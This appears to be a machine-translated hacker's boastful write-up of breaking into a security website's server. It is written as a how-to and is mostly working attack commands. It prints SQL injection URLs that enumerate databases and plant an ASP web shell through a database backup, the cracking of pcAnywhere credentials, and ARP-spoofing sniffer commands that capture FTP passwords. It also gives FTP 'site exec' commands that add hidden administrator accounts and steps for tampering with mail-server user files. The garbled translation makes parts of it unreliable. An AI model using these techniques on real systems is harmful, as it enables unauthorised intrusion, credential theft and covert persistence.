Black line of defense-risks outside the host

It doesn't matter if I want to engage you, but if you are a little overdo, sell your money with someone else's manuscript, and decorate yourself with someone else's technology. I have to remind you that your superiority is based on others' contributions.

1. Scan and find ftp on ..... No common vulnerabilities ..... Determines arp spoofing for sniffing.

2. Find the sniffing Host:

C:> ping www.hacker.com.cn

Pinging www.hacker.com.cn [211.157.102.239] with 32 bytes of data:

Start scanning port 211.157.102.1-211.157.102.255 80 + 1433, locate a site in the default directory, and find the injection vulnerability.

Asp? Id = 3400 "target = _ blank> http://xx.xx.xx.xx/111.asp? Id = 3400 and 1 = (SELECT IS_SRVROLEMEMBER (sysadmin ))

No sa permission found:

Http://xx.xx.xx.xx/111.asp? Id = 3400 and 1 = (select name from master. dbo. sysdatabases where dbid = 7)

Obtain the database name ku1:

Come on, find a way to create a shell (Here we would like to thank the smelly rice materials). If you don't understand it, read more online materials:

Http://xx.xx.xx.xx/111.asp? Id = 3400; create table [dbo]. [xiaolu] ([xiaoxue] [char] (255 ));--

Http://xx.xx.xx.xx/111.asp? Id = 3400; DECLARE @ result varchar (255) EXEC master. dbo. xp_regread HKEY_LOCAL_MACHINE, role Roots,/, @ result output insert into xiaolu (xiaoxue) values (@ result );--

Http://xx.xx.xx.xx/111.asp? Id = 3400 and (select top 1 xiaoxue from xiaolu) = 1

The following figure shows the web path d: xxxx:

Http://xx.xx.xx.xx/111.asp? Id = 3400; use ku1 ;--

Http://xx.xx.xx.xx/111.asp? Id = 3400; create table cmd (str image );--

Http://xx.xx.xx.xx/111.asp? Id = 3400; insert into cmd (str) values ();--

Http://xx.xx.xx.xx/111.asp? Id = 3400; backup database ku1 to disk = D: xxxxl. asp ;--

(For the use of this shell, see the smallest asp backdoor dynamic http://666w.cn/down/view.asp? Id = 754)

Upload ............ shell, and prepare to escalate the permission .......... Find pcanywhere and find:

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/PCA. xxx. CIF

The password is cracked and the pcanywhere connection seems to be helpful to me. Everything goes smoothly. The admin password is the same as the pcanywhere password. :), tracert:

1 <10 MS <10 MS <10 MS 211.157.102.239

Alas, arp spoofing can be performed when the anti-DDOS service is in this situation. (For more information about arp spoofing, bbs.666379cn/dispbbs.asp? BoardID = 7 & ID = 764 & page = 1)

Use webshell to upload the required software:

WinPcap.exe arpsniffer.exe pv.exe

Arpsniffer.exe ------------ 57 k Rongge's sniffing tool in the exchange environment

Pv.exe ---------------- 60 k (a command line program attached to PrcView, which has been executed by huajun) to kill the process

A driver used by WinPcap.exe ---------------- 678 k sniffing

Install winpcap.exe. Next, click Next.

Create a hidden virtual directory (how to create your own data query), and set the application protection to low so that we can use webshell to run arp programs. Otherwise, it will be difficult for administrators to find out.

3. Start sniffing:

OK, continue ........ start SNIFFER ........ due to the current Chinese network structure and related technical personnel quality issues. this can be said to be a hundred thousand, run:

Arpsniffer.exe 211.157.102.254 211.157.102.239 21 c: 111.txt 1

211.157.102.254 is the gateway, 211.157.102.239 is the anti-Black ip, c: 111.txt is the log file, and 1 is the NIC id

What to do next? Of course it is waiting ....... but we don't want to wait a few days. we hope we can make it better. tell your friends to take action and help me. Help me tell the editor that your website has been hacked .........

Needless to say, I got the ftp password a few minutes later, because the arpsnifer process was running and we couldn't see it directly, so we ran it using webshell:

Pv-k-f arpsniffer.exe

Kill the process and check the password ~~~~~~

4. At work:

Upload shell! The disk is not secure. You can browse all disks. The target disk is e: snapshot. Continue fpipe-v-l 3041-r 43958 127.0.0.1.

Add an ftp user, set it as an administrator, and log on to and run

Quote site exec net1king xiaolu xiaoxue/add

Quote site exec net1king localgroup administrators xiaolu/add

3389 login, ah, no, continue

Quote site exec net1king xiaolu xiaoxue @@! #! @#@!! ##@ 123/add

Quote site exec net1king localgroup administrators xiaolu/add

Haha, I also made password restrictions and went in. Next I will not talk about it. It will make anti-DDoS edit a headache ........ (N content is omitted here)

Let's take a look at some good things and find out there is a webeasymail server. Read the mail and look at the documents that make the editors better off. I don't know what the password looks like.

Hey, come with me: D:/mail/. Each user directory has UserWeb. ini

Open, modify

QuestionInfo = 1

AnswerInfo = 1

HintInfo = 1

Hit Logging

It's time to retreat, and leave the rest to the editors.

V. Summary:

This intrusion lasted about one hour. There was no advanced technology, but it was a simple technology. Sniffing penetration was a technology several years ago, and SQL injection was a popular method, it's not new. It's thanks to the "social engineering" of friends who can get the ftp password so quickly.

Although the technology is very valuable, flexible use will make the technology more valuable.